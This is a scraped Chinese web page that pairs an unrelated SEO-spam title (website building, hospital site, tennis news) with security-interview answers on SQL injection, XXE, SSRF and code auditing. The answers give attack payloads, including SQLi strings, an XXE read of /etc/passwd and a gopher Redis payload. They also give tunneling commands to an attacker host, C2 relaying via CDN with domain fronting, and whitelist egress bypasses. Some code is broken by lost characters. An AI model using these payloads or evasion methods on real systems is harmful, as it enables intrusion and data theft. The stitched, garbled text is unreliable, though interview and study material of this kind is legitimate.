网站建设方案申请如皋建设医院网站

网站建设方案申请,如皋建设医院网站,idc销售网站源码,网球新闻最新消息安全领域各种资源#xff0c;学习文档#xff0c;以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具#xff0c;欢迎关注。 目录 一、SQL查询异常流量分析思路 二、系统后门检测工具 三、安全设备实战经验 四、安全研究实习生岗位认知 …安全领域各种资源学习文档以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具欢迎关注。目录一、SQL查询异常流量分析思路二、系统后门检测工具三、安全设备实战经验四、安全研究实习生岗位认知五、开源框架审计经验六、XXE漏洞代码层面成因七、无法预编译的SQL语句八、MySQL版本获取方式九、宽字节注入原理十、不出网机器文件传输方案十一、PHP代码审计流程十二、ThinkPHP框架审计重点十三、TCP/UDP不出网代理方案十四、多级代理CDN中转实现十五、ACL白名单绕过技术十六、PHP SSRF深度利用十七、内网服务请求方法十八、SSRF白名单绕过细节十九、PHP三等号 vs 两等号1001 SQL查询异常流量分析的思路 1002 你使用什么工具来判断系统是否存在后门 1003 有没有了解或者使用过厂商的安全设备(有的话请举例说明) 1004 你投的岗位是安全研究实习生你了解我们这边主要是做什么的吗 1005 有没有审过开源框架、cms、中间件之类的 1006 xxe是怎么造成的从代码层面来看 1007 有哪些SQL语句无法使用预编译的方式 1008 已知example.com/?id 1是mysql如何获得mysql版本 1009 宽字节注入原理是只有 gbk 编码的才存在宽字节注入吗 1010 一台机器不能出网如何把一个 exe 文件放到对应的目标机器上去dmz 区 1011 拿到一份php代码做审计审计的流程大概是怎样的 1012 对php开发框架熟吗比如ThinkPHP这些 1013 给的源码是ThinkPHP框架的话审计起来和没有使用框架的有什么不同从流程上或者从关注的点上有什么不同 1014 如果 tcp 和 udp 不出网 用什么策略来进行代理的搭建 1015 多级代理如何做一个 cdn 进行中转 具体怎么实现 1016 内网有 acl 策略 如果是白名单 如何绕过这个白名单进行出网上线 ip 和域名的都有可能 1017 在php环境下怎么最大程度的利用ssrf拿到shell或者进内网 1018 怎么利用内网的机器请求内网中的服务 1019 如果用白名单策略修复ssrf从用户输入的变量里拿出要访问的目标这个要注意哪些因为一些url会通过特殊的字符做白名单绕过对取变量这个操作有哪些要注意的细节 1020 php中三个等号和两个等号有什么区别一、SQL查询异常流量分析思路mermaidgraph TD A[协议特征] -- A1(异常Content-Type如application/sql) A -- A2(超长SQL语句 10KB) B[行为模式] -- B1(高频相似语句如连续50SELECT) B -- B2(非常规时间访问凌晨执行DROP) C[语法特征] -- C1(敏感关键词xp_cmdshell/LOAD_FILE) C -- C2(异常注释符/*!50000SELECT*/) D[关联分析] -- D1(同源IP历史行为基线对比) D -- D2(失败率突增SQL语法错误激增)关键点需结合WAF日志与数据库审计日志交叉验证重点识别时间盲注固定延时与布尔注入规律性状态码切换二、系统后门检测工具类型工具检测能力内存扫描Volatility检测隐藏进程/恶意DLL注入Rootkit检测chkrootkit rkhunter内核钩子/LKM模块比对文件监控Tripwire AIDE关键目录哈希变更告警行为沙箱Cuckoo SandboxAPI调用链分析如远程线程创建进阶方案EDR工具如CrowdStrike Falcon的IOA攻击指标检测引擎三、安全设备实战经验markdown1. **防火墙** - Palo Alto应用层策略阻断如精准识别SQLi via APP-ID 2. **IDS/IPS** - Suricata自定义规则拦截C2心跳alert http any any - any any (content:|0d 0a|cmd; sid:10001;) 3. **WAF** - ModSecurityCRS规则集防御OWASP Top 10漏洞 4. **蜜罐** - HFish伪造MySQL服务捕获扫描器行为四、安全研究实习生岗位认知核心方向推测需根据实际公司调整mermaidpie title 安全研究实习岗位职责分布 “漏洞挖掘” 45 “PoC开发” 30 “威胁建模” 15 “工具链优化” 10预期能力开源组件漏洞挖掘如Log4j2 RCE研究红队工具链开发如定制化C2框架ATTCK技战术映射分析五、开源框架审计经验审计流程入口点定位危险函数扫描grep -rn system(\|exec( src/数据流追踪用户输入 → 过滤函数 → 执行点如TP框架的I(get.id)历史漏洞比对检查未修复漏洞分支如ThinkPHP 5.0.23的RCE案例Discuz! X3.4的php://input未过滤导致代码执行Apache Shiro反序列化密钥硬编码问题六、XXE漏洞代码层面成因漏洞代码示例php$xml XML ?xml version1.0? !DOCTYPE root [!ENTITY xxe SYSTEM file:///etc/passwd] rootxxe;/root XML; $data simplexml_load_string($xml); // 未禁用外部实体根本原因未配置libxml_disable_entity_loader(true)解析器允许DTD外部引用如PHP的LIBXML_NOENT七、无法预编译的SQL语句场景示例解决方案动态表名/列名SELECT * FROM $table白名单校验复杂排序ORDER BY $column $sort参数化字段名映射IN子句WHERE id IN (?,?,?)预编译后动态绑定参数数量八、MySQL版本获取方式sql1. 报错泄露id1 and updatexml(1,concat(0x7e,version()),1)-- 2. 联合查询id-1 union select 1,version,3 3. 时间盲注id1 and if(version() like 8%,sleep(3),1)-- 4. 直接读取SHOW VARIABLES LIKE %version%九、宽字节注入原理成因GBK编码中%df组合被解析为運%df%5c運导致单引号逃逸id1%df→ 后端拼接为1運非GBK场景BIG5的%A5%60绕过Shift_JIS的%81%27转换十、不出网机器文件传输方案层级跃迁技术mermaidgraph LR A[攻击机] -- B{中间跳板} B --|协议隧道| C[目标DMZ]物理层USB恶意充电设备需物理接触网络层ICMP隧道icmpsh -t 目标IP -d 1DNS隐蔽信道dnscat2应用层SMB中继impacket-smbserver共享文件恶意文档诱使目标点击下载十一、PHP代码审计流程markdown1. **入口定位** - 路由解析index.php?mHomecIndexaindex 2. **危险函数追踪** - 执行类eval()/system() - 文件类file_get_contents() - 反序列化unserialize() 3. **过滤链分析** - 全局过滤 vs 局部过滤 - 二次注入检测 4. **框架机制利用** - TP的__destruct魔术方法触发链十二、ThinkPHP框架审计重点方向无框架项目ThinkPHP项目入口文件分散入口统一入口单一index.php 安全过滤手动过滤参差不齐全局Input过滤函数风险点直接文件包含路由解析漏洞5.0.23 RCE审计工具传统文本搜索利用phpan分析调用链十三、TCP/UDP不出网代理方案协议转换隧道ICMP隧道工具ptunnel -p jump_server -lp 1080 -da target_ipDNS隧道工具iodine -f -P password attacker.comHTTP伪装Websocket over HTTPreGeorg十四、多级代理CDN中转实现架构示例攻击机 → CDN节点Cloudflare → 反向代理Nginx → C2服务器配置要点CDN开启WebSocket支持Nginx配置nginxlocation /ws { proxy_pass http://c2_server:8080; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; }C2使用域前置技术Domain Fronting十五、ACL白名单绕过技术域名绕过子域名接管c2.trusted-domain.comDNS泛解析*.attacker.com指向C2IP绕过云函数转发阿里云函数计算绑定白名单IP合法服务滥用GitHub Gist作为C2信道十六、PHP SSRF深度利用攻击链扩展mermaidgraph TB A[SSRF] -- B{内网服务} B -- C[Redis未授权] -- C1(写Webshell) B -- D[Jenkins脚本控制台] -- D1(命令执行) B -- E[云元数据] -- E1(AccessKey劫持)关键技巧gopher://协议攻击Redisgopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a十七、内网服务请求方法反向代理reGeorg Proxifier打通Socks隧道端口转发frp -t 内网服务IP:PortDNS重绑定利用TTL0绕过IP限制十八、SSRF白名单绕过细节解析陷阱攻击手法示例防御方案URL编码绕过http://x.yevil.com解析后提取hostIPv6混淆http://[::127.0.0.1]标准化所有IP格式重定向利用短域名→内网IP禁用CURLOPT_FOLLOWLOCATION畸形协议0://127.0.0.1:80协议白名单校验十九、PHP三等号 vs 两等号核心区别php$a 0; $b 0; // 双等号类型转换 var_dump($a $b); // true字符串0转数字为0 // 三等号严格校验 var_dump($a $b); // false类型不同安全影响认证绕过if ($_GET[code] 123456)可通过?code123456abc绕过哈希比较0e123 0e456因科学计数法匹配导致漏洞